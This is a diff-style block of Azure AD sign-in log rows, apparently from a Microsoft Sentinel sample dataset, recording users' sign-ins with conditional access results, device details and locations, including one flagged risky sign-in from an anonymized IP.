+279,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:59.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ad8801a-a0ea-43e1-b106-94998e672129,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",325d7c9c-ae51-4f5f-a5f7-8aa4b0de1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,325d7c9c-ae51-4f5f-a5f7-8aa4b0de1000,SigninLogs,Sucess,41.90428925,-85.99833679
+280,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:26.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,74fd553a-d44a-449a-92b0-084a2356a474,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",fd7a6355-56f5-4bc2-9ad4-c25906671000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,fd7a6355-56f5-4bc2-9ad4-c25906671000,SigninLogs,Sucess,50.6406517,5.572050095
+281,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",0d3dadc7-5b90-4194-87e2-04e093ca0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Services,0d3dadc7-5b90-4194-87e2-04e093ca0500,SigninLogs,Sucess,34.06555176,-118.2405396
+282,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,73af469f-302d-0000-54b3-35991f963600,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",178eb907-c36d-4662-9369-da02c3b20700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,178eb907-c36d-4662-9369-da02c3b20700,SigninLogs,Sucess,28,3
+283,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0979c8f4-572e-4941-88f8-17fa4ff7c905,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 22:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8ccd2b23-7303-4913-b6ad-508705b60200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8ccd2b23-7303-4913-b6ad-508705b60200,SigninLogs,Sucess,36.6404686,-78.26995087
+284,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:04.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8bffd729-abc8-4da6-9ae3-cf44f1d37ea4,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b3c0863d-787e-45d0-a1b5-da548d2e0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da548d2e0200,SigninLogs,Sucess,36.6404686,-78.26995087
+285,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:38.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfcf3990-7152-4749-81ff-b96f50d59f00,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 6,4,IN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dcce290a00,,,"{'countryOrRegion': 'IN', 'geoCoordinates': {'longitude': 72.87770080566406, 'latitude': 19.076000213623047}, 'state': 'Maharashtra', 'city': 'Mumbai'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 6,dd7e1752-57a8-4e72-8589-6a68e4a1f500,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dcce290a00,SigninLogs,Sucess,19.07600021,72.87770081
+286,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:32.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6b13be09-0fe6-42bf-a1e9-b652ae050717,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:38,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Chrome 80.0.3987', 'displayName': 'LCFLAGLER12', 'isCompliant': True, 'trustType': 'Azure AD registered', 'isManaged': True}",9b73e957-44ae-40ab-bb07-110288b73900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],{'errorCode': 0},Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9b73e957-44ae-40ab-bb07-110288b73900,SigninLogs,Sucess,29.4803009,-81.21395111
+287,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:54.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS 